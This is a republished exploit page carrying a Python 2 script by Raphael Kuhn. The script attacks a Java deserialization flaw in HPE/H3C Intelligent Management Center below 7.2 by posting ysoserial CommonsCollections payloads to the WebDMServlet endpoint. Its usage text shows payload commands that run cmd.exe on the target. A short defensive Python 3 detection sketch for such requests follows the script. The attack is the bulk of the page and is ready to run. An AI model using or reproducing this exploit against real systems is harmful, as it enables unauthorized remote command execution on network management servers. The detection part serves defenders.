HPE < 7.2 - Java Deserialization
Source: vfocus.net  Author: Kuhn  Published: 2017-09-20
#!/usr/bin/env python
########################################################################################################
#
# HPE/H3C IMC - Java Deserialization Exploit
#
# Version 0.1
# Tested on Windows Server 2008 R2
# Name HPE/H3C IMC (Intelligent Management Center) Java 1.8.0_91
#
# Author:
# Raphael Kuhn (Daimler TSS)
#
# Special thanks to:
# Jan Esslinger (@H_ng_an) for the websphere exploit this one is based upon
#
#######################################################################################################
# Python 2 script (print statements).

import requests
import sys
import os
import os.path
from requests.packages.urllib3.exceptions import InsecureRequestWarning

# Certificate verification is disabled below (verify=False); silence the resulting warning.
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

host = "127.0.0.1:8080"
payload_file = "payload.bin"
body = ""


def printUsage():
    print "......................................................................................................................"
    print "."
    print ". HPE/H3C - IMC Java Deserialization Exploit"
    print "."
    print ". Example 1: -payload-binary"
    print ". [-] Usage: %s http[s]://: -payload-binary payload" % sys.argv[0]
    print ". [-] Example: %s https://127.0.0.1:8880 -payload-binary ysoserial_payload.bin" % sys.argv[0]
    print ". 1. Create payload with ysoserial.jar (https://github.com/frohoff/ysoserial/releases) "
    print ". java -jar ysoserial.jar CommonsCollections3 'cmd.exe /c ping -n 1 53.48.79.183' > ysoserial_payload.bin"
    print ". 2. Send request to server"
    print ". %s https://127.0.0.1:8880 -payload-binary ysoserial_payload.bin" % sys.argv[0]
    print "."
    print ". Example 2: -payload-string"
    print '. [-] Usage: %s http[s]://: -payload-string "payload"' % sys.argv[0]
    print '. [-] Example: %s https://127.0.0.1:8880 -payload-string "cmd.exe /c ping -n 1 53.48.79.183"' % sys.argv[0]
    print ". 1. Send request to server with payload as string (need ysoserial.jar in the same folder)"
    print '. %s https://127.0.0.1:8880 -payload-string "cmd.exe /c ping -n 1 53.48.79.183"' % sys.argv[0]
    print "."
    print "......................................................................................................................"


def loadPayloadFile(_fileName):
    # Read the serialized payload as raw bytes.
    print "[+] Load payload file %s" % _fileName
    payloadFile = open(_fileName, 'rb')
    payloadFile_read = payloadFile.read()
    return payloadFile_read


def exploit(_payload):
    # The serialized object is sent as the raw POST body to the IMC topology servlet.
    url = sys.argv[1]
    url += "/imc/topo/WebDMServlet"
    print "[+] Sending exploit to %s" % (url)
    data = _payload
    response = requests.post(url, data=data, verify=False)
    return response


# Response check left disabled by the author:
#def showResponse(_response):
#    r = response
#    m = r.search(_response)
#    if (m.find("java.lang.NullPointerException")):
#        print "[+] Found java.lang.NullPointerException, exploit finished successfully (hopefully)"
#    else:
#        print "[-] ClassCastException not found, exploit failed"


if __name__ == "__main__":
    if len(sys.argv) < 4:
        printUsage()
        sys.exit(0)
    else:
        print "------------------------------------------"
        print "- HPE/H3C - IMC Java Deserialization Exploit -"
        print "------------------------------------------"
        host = sys.argv[1]
        print "[*] Connecting to %s" % host
        if sys.argv[2] == "-payload-binary":
            payload_file = sys.argv[3]
            if os.path.isfile(payload_file):
                payload = loadPayloadFile(payload_file)
                response = exploit(payload)
                # showResponse() is commented out above, so report completion the same
                # way the -payload-string branch does.
                print "[+] Response received, exploit finished."
            else:
                print "[-] Can't load payload file"
        elif sys.argv[2] == "-payload-string":
            if os.path.isfile("ysoserial.jar"):
                sPayload = sys.argv[3]
                sPayload = "java -jar ysoserial.jar CommonsCollections5 '" + sPayload + "' > payload.bin"
                print "[+] Create payload file (%s) " % sPayload
                os.system(sPayload)
                payload = loadPayloadFile(payload_file)
                response = exploit(payload)
                print "[+] Response received, exploit finished."
            else:
                print "[-] Can't load ysoserial.jar"
        else:
            printUsage()
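For defenders: the script above delivers a raw Java serialized stream as the POST body to /imc/topo/WebDMServlet, which is what a proxy or WAF log check can key on. The following Python 3 detection sketch is an added example, not part of the original exploit or of any HPE tooling; the function names, the watched package prefix and the sample body are assumptions constructed for illustration.

```python
import re
import struct

# Java Object Serialization Stream header: STREAM_MAGIC (0xACED) + STREAM_VERSION (0x0005).
JAVA_STREAM_HEADER = b"\xac\xed\x00\x05"
TC_CLASSDESC = 0x72  # record type that introduces a class descriptor
IMC_SERVLET_PATH = "/imc/topo/WebDMServlet"  # endpoint the script above posts to
# Assumption: package behind the ysoserial CommonsCollections payloads named in the usage text.
WATCHED_PREFIXES = ("org.apache.commons.collections",)
CLASS_NAME_RE = re.compile(rb"[A-Za-z_$\[][\w.$;\[]*")


def class_names(stream):
    """Heuristic scan for TC_CLASSDESC records: 0x72, big-endian u16 length, class name."""
    names, i = [], len(JAVA_STREAM_HEADER)
    while i + 3 <= len(stream):
        if stream[i] == TC_CLASSDESC:
            (length,) = struct.unpack_from(">H", stream, i + 1)
            name = stream[i + 3:i + 3 + length]
            if 0 < length == len(name) and CLASS_NAME_RE.fullmatch(name):
                names.append(name.decode("ascii"))
                i += 3 + length
                continue
        i += 1
    return names


def inspect_request(method, path, body):
    """Return a finding for a POST whose body is a raw Java serialized stream, else None."""
    if method.upper() != "POST" or not body.startswith(JAVA_STREAM_HEADER):
        return None
    names = class_names(body)
    return {
        "imc_servlet": path.split("?", 1)[0].rstrip("/") == IMC_SERVLET_PATH,
        "classes": names,
        "watched": [n for n in names if n.startswith(WATCHED_PREFIXES)],
    }


# Constructed sample: header, TC_OBJECT ('s'), one class descriptor. Not a working payload.
SAMPLE_CLASS = b"org.apache.commons.collections.ConstructedExample"
SAMPLE_BODY = (JAVA_STREAM_HEADER + b"s" + bytes([TC_CLASSDESC])
               + struct.pack(">H", len(SAMPLE_CLASS)) + SAMPLE_CLASS)

if __name__ == "__main__":
    print(inspect_request("POST", IMC_SERVLET_PATH, SAMPLE_BODY))
    print(inspect_request("POST", IMC_SERVLET_PATH, b"user=admin"))
```

The class-name scan is a heuristic over the byte stream rather than a full stream parser, so treat a hit as a triage signal; the stream header on a POST to the servlet path is the stronger indicator.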